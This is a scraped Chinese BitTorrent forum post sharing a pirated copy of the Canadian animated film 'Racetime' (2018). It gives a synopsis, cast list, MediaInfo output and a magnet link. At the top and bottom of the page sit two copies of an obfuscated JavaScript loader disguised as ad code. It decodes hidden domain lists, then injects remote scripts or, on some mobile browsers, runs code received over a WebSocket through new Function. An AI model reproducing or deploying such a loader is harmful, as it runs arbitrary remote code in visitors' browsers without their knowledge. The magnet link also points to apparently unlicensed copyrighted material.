冰雪大作战2[国语配音/中文字幕].Racetime.2018.2160p.WEB-DL.H265.DDP5.1.2Audio 1.52GB

版主小s 28天前 198

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 冰雪大作战2 / La course des Tuques / Snowtime! 2

◎片 名 Racetime

◎年 代 2018

◎产 地 加拿大

◎类 别 动画 / 冒险

◎语 言 英语

◎上映日期 2021-04-30(中国大陆) / 2018-12-07(加拿大) / 2018-12-14(罗马尼亚)

◎IMDb链接 https://www.imdb.com/title/tt8925540/

◎豆瓣链接 https://movie.douban.com/subject/30418849/

◎片 长 90分钟

◎导 演 让-弗朗索瓦·波略特 Jean-Fran?ois Pouliot (id:1294799)

弗兰克·布里森 Fran?ois Brisson (id:1367821)

◎编 剧 Claude Landry Claude Landry (id:1171374)

◎演 员 露辛达·戴维斯 Lucinda Davis (id:1367824)

道恩·福特 Dawn Ford (id:1397485)

托德·芬内尔 Tod Fennell (id:1084347)

安吉拉·嘉鲁皮 Angela Galuppo (id:1367823)

索哈·鲍尔 Sonja Ball (id:1374246)

Jenna Wheeler-Hughes (id:1258033)

霍莉·G·弗兰克尔 Holly G. Frankel (id:1080627)

海蒂·林恩·维克斯 Heidi Lynne Weeks (id:1367830)

艾琳·波斯瓦拉·乐卡克 Hélène Bourgeois Leclerc (id:1367827)

苏菲·卡迪欧 Sophie Cadieux (id:1181651)

安妮·卡萨邦尼 Anne Casabonne (id:1367826)

雨果林·什维特·兰黛斯科 Hugolin Chevrette-Landesque (id:1367831)

诺尔·费舍 Noel Fisher (id:1084181)

élo?sa Laflamme-Cervantes élo?sa Laflamme-Cervantes (id:1195937)

Vénutia-Ludivine Reding (id:1243751)

塞巴斯蒂安·瑞丁 Sebastién Reding (id:1367829)

吉尔多·罗伊 Gildor Roy (id:1140920)

尼可拉斯·萨维德·鲁比尔 Nicholas Savard-L'Herbier (id:1367825)

凯瑟琳·特鲁多 Catherine Trudeau (id:1152037)

玛丽欧·沃尔夫 Mariloup Wolfe (id:1014499)

◎标 签 动画 / 加拿大 / 冰雪大作战2 / 成长 / 温情 / 电影 / 喜剧 / 2018

◎简 介

续作延续前一部的风格,讲述在这座加拿大小镇上,开展了一场盛大的雪橇比赛,弗兰基带着他的团队参赛,而索菲亚则担任舵手,除此之外,还有新的成员加入了这场比赛,包括神秘而自负的扎克、以及扎克的运动员表姐查莉....

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 252584970830455857207955604291488793360 (0xBE06188BC0A91A73D7412FACBA834310)

  4. Complete name : 冰雪大作战[email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.52 GiB

  8. Duration : 1 h 29 min

  9. Overall bit rate : 2 434 kb/s

  10. Encoded date : UTC 2021-11-03 06:40:11

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 29 min

  20. Bit rate : 1 920 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 616 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.013

  30. Stream size : 1.20 GiB (79%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 29 min

  40. Bit rate mode : Constant

  41. Bit rate : 256 kb/s

  42. Channel(s) : 6 channels

  43. Channel layout : L R C LFE Ls Rs

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 164 MiB (11%)

  48. Title : English

  49. Language : English

  50. Service kind : Complete Main

  51. Default : Yes

  52. Forced : No


  53. Audio #2

  54. ID : 3

  55. Format : E-AC-3

  56. Format/Info : Enhanced AC-3

  57. Commercial name : Dolby Digital Plus

  58. Codec ID : A_EAC3

  59. Duration : 1 h 29 min

  60. Bit rate mode : Constant

  61. Bit rate : 256 kb/s

  62. Channel(s) : 6 channels

  63. Channel layout : L R C LFE Ls Rs

  64. Sampling rate : 48.0 kHz

  65. Frame rate : 31.250 FPS (1536 SPF)

  66. Compression mode : Lossy

  67. Stream size : 164 MiB (11%)

  68. Title : Chinese

  69. Language : Chinese

  70. Service kind : Complete Main

  71. Default : No

  72. Forced : No




复制代码


TAGS 冒险 动画

磁力链:
  • magnet:?xt=urn:btih:F71F03A1236E4810DE4856DF5B5154E752704A06

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};